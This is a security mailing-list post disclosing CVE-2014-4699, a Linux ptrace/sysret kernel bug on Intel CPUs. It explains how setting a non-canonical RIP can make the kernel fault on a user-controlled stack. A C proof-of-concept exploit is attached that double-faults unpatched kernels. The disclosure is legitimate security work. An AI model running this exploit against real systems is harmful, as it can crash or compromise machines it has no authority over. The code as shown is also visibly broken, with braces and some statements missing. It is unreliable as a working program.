Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Tue, 08 Jul 2014 15:22:36 -0700
From: Andy Lutomirski <>
Subject: Re: CVE-2014-4699: Linux ptrace bug

On 07/04/2014 02:05 PM, Andy Lutomirski wrote:
> Hi everyone-
> Upstream commit b9cd18de4db3c9ffa7e17b0dc0ca99ed5aa4d43a fixes a
> ptrace bug.  The exact scope of the bug is somewhat unclear right now.
> I see no reason why the bug should not be present as far back as Linux
> 2.6.17, but it seems to be difficult to reproduce on old kernels.
> There is some ongoing discussion on linux-distros about the impact and
> applicability of this bug.
> More details and a PoC to follow some time next week.
> I'm being intentionally vague here: this bug has existed for a long
> time, but exploiting it at all is tricky enough (and possibly
> kernel-version dependent enough) that it's gone unnoticed.  I would
> currently prefer to give the distros and users a bit of a headstart
> before publicly disclosing the complete details of how to test/exploit
> the bug.  It is likely to have a high enough impact, at least on new
> enough kernels, that it should be patched ASAP.

Time for full details.

Intel CPUs implement sysret oddly: sysret will #GP *from kernel mode* if
RIP/RCX is non-canonical.  This is only a problem because sysret does
not affect RSP, so the kernel needs to load the user's RSP value prior
to running sysret.  That means that an exception frame will be written
to the address at RSP, which is necessarily user-controlled.  If RSP is
a writable user address and the CPU does not have SMAP, then the
kernel's general_protection handler will actually execute from a
user-controlled stack, and user code can attempt to race with the kernel
to take over the system.

Even on SMAP systems (which no one has yet anyway), it's possible to set
RSP to point to an important kernel data structure and overwrite it in a
partially controlled manner.  Overwriting the IDT like this was
traditional, but that's difficult now on Linux, since the public IDT
address is read-only.

If RSP points somewhere non-writable, then sysret will double-fault and
OOPS cleanly on an IST stack.

The upshot is that allowing user code to set the saved RIP address to a
non-canonical value in a non-IRET-using system call is bad.  On recent
unpatched kernels, this can be done using fork(2).  On other kernels,
there may or may not be other attack vectors.

The upstream fix fixes a related bug in that the sysret path failed to
restore some registers on the same fork(2) path.  This could potentially
cause gdb to malfunction.

I've attached a proof-of-concept exploit.  It double-faults reliably on
unpatched Intel CPUs.  The precise cause of the double-fault is left as
an exercise to the reader :)


#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/syscall.h>
#include <sys/user.h>
#include <unistd.h>
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <err.h>

static siginfo_t wait_trap(pid_t chld)
	siginfo_t si;
	if (waitid(P_PID, chld, &si, WEXITED|WSTOPPED) != 0)
		err(1, "waitid");
	if (si.si_pid != chld)
		errx(1, "got unexpected pid in event\n");
	if (si.si_code != CLD_TRAPPED)
		errx(1, "got unexpected event type %d\n", si.si_code);
	return si;

int main()
	unsigned long tmp;

	pid_t chld = fork();
	if (chld < 0)
		err(1, "fork");

	if (chld == 0) {
		if (ptrace(PTRACE_TRACEME, 0, 0, 0) != 0)
			err(1, "PTRACE_TRACEME");

		return 0;

	int status;

	/* Wait for SIGSTOP and enable seccomp tracing. */
	if (waitpid(chld, &status, 0) != chld || !WIFSTOPPED(status))
		err(1, "waitpid");

	if (ptrace(PTRACE_SETOPTIONS, chld, 0, PTRACE_O_TRACEFORK) != 0)
	if (ptrace(PTRACE_CONT, chld, 0, 0) != 0)
		err(1, "PTRACE_CONT");


	errno = 0;
	tmp = ptrace(PTRACE_PEEKUSER, chld,
		     offsetof(struct user_regs_struct, rip), NULL);
	if (errno)
		err(1, "PTRACE_PEEKUSER");
	printf("child RIP = 0x%lx\n", tmp);

	if (ptrace(PTRACE_POKEUSER, chld,
		   offsetof(struct user_regs_struct, rip), (void *)(1ULL << 48)) != 0)
		err(1, "PTRACE_POKEUSER");

	errno = 0;
	tmp = ptrace(PTRACE_PEEKUSER, chld, offsetof(struct user_regs_struct, rip), NULL);
	if (errno)
		err(1, "PTRACE_PEEKUSER");
	printf("child RIP = 0x%lx\n", tmp);

	if (ptrace(PTRACE_CONT, chld, 0, 0) != 0)
		err(1, "PTRACE_CONT");
	ptrace(PTRACE_DETACH, chld, 0, 0);

	return 0;

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ